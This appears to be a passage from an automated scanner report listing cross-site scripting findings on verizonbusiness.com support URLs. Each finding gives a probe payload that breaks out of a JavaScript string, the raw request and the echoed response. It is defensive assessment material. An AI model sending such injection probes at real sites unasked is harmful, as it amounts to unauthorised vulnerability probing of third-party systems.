<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/supporta3685';8d328b9c15e/myaccount/tools/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1070. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba852"%3b33b10fd7459 was submitted in the REST URL parameter 1. This input was echoed as ba852";33b10fd7459 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportba852"%3b33b10fd7459/myaccount/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:22 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:22 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supportba852";33b10fd7459/myaccount/tools/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMU
...[SNIP]...

1.1071. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7f0c'%3b13a81df5fc4 was submitted in the REST URL parameter 2. This input was echoed as a7f0c';13a81df5fc4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccounta7f0c'%3b13a81df5fc4/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:48 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:48 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:48 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccounta7f0c';13a81df5fc4/tools/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1072. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4dd10"%3b23e36652da was submitted in the REST URL parameter 2. This input was echoed as 4dd10";23e36652da in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount4dd10"%3b23e36652da/tools/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:08 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40662
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount4dd10";23e36652da/tools/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.1073. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e2f3"%3bfb914e7b21b was submitted in the REST URL parameter 3. This input was echoed as 7e2f3";fb914e7b21b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools7e2f3"%3bfb914e7b21b/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:03 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43864
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:03 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:03 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools7e2f3";fb914e7b21b/ebonding/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SU
...[SNIP]...

1.1074. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a04cd'%3be55fbd83fcc was submitted in the REST URL parameter 3. This input was echoed as a04cd';e55fbd83fcc in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsa04cd'%3be55fbd83fcc/ebonding/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:10 GMT
Content-Type: text/html
Content-Length: 43866
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:10 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:10 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/toolsa04cd';e55fbd83fcc/ebonding/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1075. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 803fe"%3b926d64d23d6 was submitted in the REST URL parameter 4. This input was echoed as 803fe";926d64d23d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/ebonding803fe"%3b926d64d23d6/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:39 GMT
Content-Type: text/html
Content-Length: 46516
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccount/tools/ebonding803fe";926d64d23d6/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.1076. http://www.verizonbusiness.com/support/myaccount/tools/ebonding/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/ebonding/

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2da3'%3b5635c2595b9 was submitted in the REST URL parameter 4. This input was echoed as d2da3';5635c2595b9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools/ebondingd2da3'%3b5635c2595b9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:08 GMT
Content-Type: text/html
Content-Length: 46514
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools/ebondingd2da3';5635c2595b9/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1077. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3dfb6'%3bba623897a7e was submitted in the REST URL parameter 1. This input was echoed as 3dfb6';ba623897a7e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support3dfb6'%3bba623897a7e/myaccount/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:07 GMT
Content-Type: text/html
Content-Length: 40670
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/support3dfb6';ba623897a7e/myaccount/tools/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1078. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad672"%3bcfdbc7ae9c6 was submitted in the REST URL parameter 1. This input was echoed as ad672";cfdbc7ae9c6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supportad672"%3bcfdbc7ae9c6/myaccount/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:32:32 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:32:32 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:32:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
}

} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/supportad672";cfdbc7ae9c6/myaccount/tools/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINI
...[SNIP]...

1.1079. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dad2a'%3b9a5034e6e0d was submitted in the REST URL parameter 2. This input was echoed as dad2a';9a5034e6e0d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountdad2a'%3b9a5034e6e0d/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccountdad2a';9a5034e6e0d/tools/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1080. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa5b6"%3b7538b6635a3 was submitted in the REST URL parameter 2. This input was echoed as fa5b6";7538b6635a3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccountfa5b6"%3b7538b6635a3/tools/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:33:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40668
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:33:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:33:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/support/myaccountfa5b6";7538b6635a3/tools/edibilling/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMEN
...[SNIP]...

1.1081. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73b65'%3b64e9c4424ca was submitted in the REST URL parameter 3. This input was echoed as 73b65';64e9c4424ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/tools73b65'%3b64e9c4424ca/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/support/myaccount/tools73b65';64e9c4424ca/edibilling/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.1082. http://www.verizonbusiness.com/support/myaccount/tools/edibilling/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /support/myaccount/tools/edibilling/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f31e1"%3b1ed10348e60 was submitted in the REST URL parameter 3. This input was echoed as f31e1";1ed10348e60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /support/myaccount/toolsf31e1"%3b1ed10348e60/edibilling/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
